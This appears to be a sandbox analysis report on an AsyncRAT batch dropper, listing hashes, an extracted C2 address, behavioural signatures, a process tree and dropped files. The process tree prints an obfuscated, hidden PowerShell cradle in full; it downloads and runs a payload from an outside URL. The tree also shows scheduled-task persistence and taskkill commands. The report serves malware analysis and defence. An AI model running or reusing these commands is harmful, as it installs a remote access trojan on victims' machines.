Analysis
-
max time kernel
92s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
11-10-2022 21:41
Static task
static1
Behavioral task
behavioral1
Sample
OutPut2.bat
Resource
win7-20220812-en
General
-
Target
OutPut2.bat
-
Size
21KB
-
MD5
c32b1f1bb8eda7a1e148c1cdf014f23b
-
SHA1
af0cc28285fc57632751f970ba3040bb1af2faa0
-
SHA256
8a0dc53293a9c974b1884f315f724024713523a6cc95e5bb4abee5fdaf79a9b6
-
SHA512
f7d04d94d7dbabcf7aff4493745660efd65321c2d3e1c2a5c2fea4d02ecbcf90d77e322ef13d257ae263aadbd4cab6a4f237b349b8be0e3e30e3e31f6732980e
-
SSDEEP
96:VMzFOMzFJMzFLMzFeMzFzMzFJMzFTMzFiMzFJMzFLMzFUHQeMzFLMzF2MzFqMzFN:OVqYFQqwxqYgQFYNpdiohUPOzfXwQ9j
Malware Config
Extracted
asyncrat
| Edit 3LOSH RAT
Default
andojan.ddns.net:6606
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4476-156-0x0000000000400000-0x0000000000414000-memory.dmp asyncrat behavioral2/memory/4476-157-0x000000000040EBAE-mapping.dmp asyncrat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 5040 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 460 set thread context of 4476 460 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1256 schtasks.exe 4792 schtasks.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 3372 taskkill.exe 2344 taskkill.exe 1732 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 5040 powershell.exe 5040 powershell.exe 460 powershell.exe 460 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exetaskkill.exetaskkill.exetaskkill.exepowershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 5040 powershell.exe Token: SeDebugPrivilege 3372 taskkill.exe Token: SeDebugPrivilege 2344 taskkill.exe Token: SeDebugPrivilege 1732 taskkill.exe Token: SeDebugPrivilege 460 powershell.exe Token: SeDebugPrivilege 4476 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
cmd.execmd.exepowershell.exeWScript.execmd.exeWScript.execmd.exepowershell.exedescription pid process target process PID 3904 wrote to memory of 3016 3904 cmd.exe cmd.exe PID 3904 wrote to memory of 3016 3904 cmd.exe cmd.exe PID 3016 wrote to memory of 5040 3016 cmd.exe powershell.exe PID 3016 wrote to memory of 5040 3016 cmd.exe powershell.exe PID 5040 wrote to memory of 240 5040 powershell.exe WScript.exe PID 5040 wrote to memory of 240 5040 powershell.exe WScript.exe PID 240 wrote to memory of 3400 240 WScript.exe cmd.exe PID 240 wrote to memory of 3400 240 WScript.exe cmd.exe PID 3400 wrote to memory of 1256 3400 cmd.exe schtasks.exe PID 3400 wrote to memory of 1256 3400 cmd.exe schtasks.exe PID 3400 wrote to memory of 4792 3400 cmd.exe schtasks.exe PID 3400 wrote to memory of 4792 3400 cmd.exe schtasks.exe PID 3400 wrote to memory of 3372 3400 cmd.exe taskkill.exe PID 3400 wrote to memory of 3372 3400 cmd.exe taskkill.exe PID 3400 wrote to memory of 2344 3400 cmd.exe taskkill.exe PID 3400 wrote to memory of 2344 3400 cmd.exe taskkill.exe PID 3400 wrote to memory of 1732 3400 cmd.exe taskkill.exe PID 3400 wrote to memory of 1732 3400 cmd.exe taskkill.exe PID 4228 wrote to memory of 4172 4228 WScript.exe cmd.exe PID 4228 wrote to memory of 4172 4228 WScript.exe cmd.exe PID 4172 wrote to memory of 460 4172 cmd.exe powershell.exe PID 4172 wrote to memory of 460 4172 cmd.exe powershell.exe PID 460 wrote to memory of 4476 460 powershell.exe aspnet_compiler.exe PID 460 wrote to memory of 4476 460 powershell.exe aspnet_compiler.exe PID 460 wrote to memory of 4476 460 powershell.exe aspnet_compiler.exe PID 460 wrote to memory of 4476 460 powershell.exe aspnet_compiler.exe PID 460 wrote to memory of 4476 460 powershell.exe aspnet_compiler.exe PID 460 wrote to memory of 4476 460 powershell.exe aspnet_compiler.exe PID 460 wrote to memory of 4476 460 powershell.exe aspnet_compiler.exe PID 460 wrote to memory of 4476 460 powershell.exe aspnet_compiler.exe PID 460 wrote to memory of 4484 460 powershell.exe schtasks.exe PID 460 wrote to memory of 4484 460 powershell.exe schtasks.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\OutPut2.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeCMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81='IEX(NEW-OBJECT NET.W';$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450='EBCLIENT).DOWNLO';[BYTE[]];$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E='E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9(''https://pbc.kz/wp-admin/bb.jpg'')'.REPLACE('E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9','ADSTRING');[BYTE[]];IEX($8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81+$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450+$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81='IEX(NEW-OBJECT NET.W';$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450='EBCLIENT).DOWNLO';[BYTE[]];$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E='E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9(''https://pbc.kz/wp-admin/bb.jpg'')'.REPLACE('E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9','ADSTRING');[BYTE[]];IEX($8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81+$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450+$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E)3⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\App\xx.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\App\xx.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn App /sc minute /mo 5 /tr "C:\ProgramData\App\cAppc.vbs"6⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn det /sc minute /mo 1 /tr "C:\ProgramData\App\cAppc.vbs"6⤵
- Creates scheduled task(s)
-
C:\Windows\system32\taskkill.exetaskkill /F /IM schtasks.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM powershell.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM cmd.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\App\cAppc.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\App\cAppc.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\App\App.PS13⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn det /f4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\App\App.PS1Filesize
264KB
MD5b385ec653fef60833ca284dcfff71bff
SHA1612981ecf896a7ef09496894d8059f6a9570cf2a
SHA25676a4b8b505e22defbbd1ba2b577bafe4c4311d2d329f3d29cf3e804a7dd191e8
SHA51200f9155acd9aa8fb82c051fb4a27ee5e5b35229f69e0a20525dbcd85c2bf74025b7cc5608e1680683c4959ebfb4ad90811e006bed63e66acd6f1755005c9ba81
-
C:\ProgramData\App\cAppc.batFilesize
81B
MD56d2d36c3cc7bea993801e5febf7db1c8
SHA1962ca57c247334f79d40e55aa30612c5dfe96c12
SHA25683c47147832482038f4ac9867d5b16ccb78640d9b39d0860805b25db86609a68
SHA512751d5f167617c427697343895988e5b036eff7ee8c358ba35d764378a928b813ee798b5c2e0f67a8dac4622fd5c61708ab0823f9f1498e7d07db4bfe9f466c5d
-
C:\ProgramData\App\cAppc.vbsFilesize
5KB
MD55392a92ca835d8812a79a1ee6dac0892
SHA1cb56f654f054542c538f492c4d437d65e4f9bba7
SHA2564ab24fc3a3b34b6b7b57d5fbffba6831ed4c7a9c5c31bfd97aeb603d6bd5f2c5
SHA51202175ebd71040d878818dadb2dda855ddc9a43b1dcd625c1943bedc09b3cba48e4debd7b2401025bc992c0ca38dc96e3f2746fe1518808290c2b07132470829d
-
C:\ProgramData\App\xx.batFilesize
260B
MD515b09a88be68cc160232d8766f7e3be7
SHA1b3468aaafd099c639405574b719a201b8df00b02
SHA256d7128567b26c84039b6fd667ab0d1a443dbbdf15e0550a26e015cbab95979ae2
SHA5120cd81076a2242363bd692b12287ac31e35332b272bd1ded78d9dbd55cee3c8947cce3f45cc4b24bb6c303032d2dfb6efe87edff49fa242b4013e56eaa1cd0460
-
C:\ProgramData\App\xx.vbsFilesize
4KB
MD51de9b452f5231a8281209d61a101bcb5
SHA127ea6c5470a58226b7a1ab8986d3d0bec87ae3eb
SHA2560920a4adad558df5820ab49ab8566d9dbea771da520a754c2652fa5548852f64
SHA512e22f70de118f0b6b53e1277ee1c07f30e9d7356db36d858025725b1b0ee2cd677ac926fcb5587243fb342ef7fcff498a68eb6d8ebef3497b5c450468f0d7c4ec
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD59370680d9e75f9273830871b94aff80d
SHA10af89e92ff564c0bde6e1efa6e4e2d91e6d90fa3
SHA2564300d4dc2ece67f8a9e2c6a70c1b8eedb977c1bdf7a8a5be4e7f7e5afb55d27c
SHA512b4b497f9b7b27b018e94fb6ec6ff6143fcb26a298e82d4146b05402354b2345118955fa0f9160aa56102d413a22a58a102d11748491727e1830e06a686e04af1
-
memory/240-137-0x0000000000000000-mapping.dmp
-
memory/460-154-0x00007FFA31B30000-0x00007FFA325F1000-memory.dmpFilesize
10.8MB
-
memory/460-155-0x00007FFA31B30000-0x00007FFA325F1000-memory.dmpFilesize
10.8MB
-
memory/460-150-0x0000000000000000-mapping.dmp
-
memory/460-159-0x00007FFA31B30000-0x00007FFA325F1000-memory.dmpFilesize
10.8MB
-
memory/1256-142-0x0000000000000000-mapping.dmp
-
memory/1732-146-0x0000000000000000-mapping.dmp
-
memory/2344-145-0x0000000000000000-mapping.dmp
-
memory/3016-132-0x0000000000000000-mapping.dmp
-
memory/3372-144-0x0000000000000000-mapping.dmp
-
memory/3400-141-0x0000000000000000-mapping.dmp
-
memory/4172-149-0x0000000000000000-mapping.dmp
-
memory/4476-157-0x000000000040EBAE-mapping.dmp
-
memory/4476-162-0x0000000006040000-0x00000000060A6000-memory.dmpFilesize
408KB
-
memory/4476-161-0x0000000006580000-0x0000000006B24000-memory.dmpFilesize
5.6MB
-
memory/4476-160-0x0000000005F30000-0x0000000005FCC000-memory.dmpFilesize
624KB
-
memory/4476-156-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/4484-158-0x0000000000000000-mapping.dmp
-
memory/4792-143-0x0000000000000000-mapping.dmp
-
memory/5040-134-0x000002221F850000-0x000002221F872000-memory.dmpFilesize
136KB
-
memory/5040-133-0x0000000000000000-mapping.dmp
-
memory/5040-135-0x00007FFA31BE0000-0x00007FFA326A1000-memory.dmpFilesize
10.8MB
-
memory/5040-136-0x00007FFA31BE0000-0x00007FFA326A1000-memory.dmpFilesize
10.8MB
-
memory/5040-139-0x00007FFA31BE0000-0x00007FFA326A1000-memory.dmpFilesize
10.8MB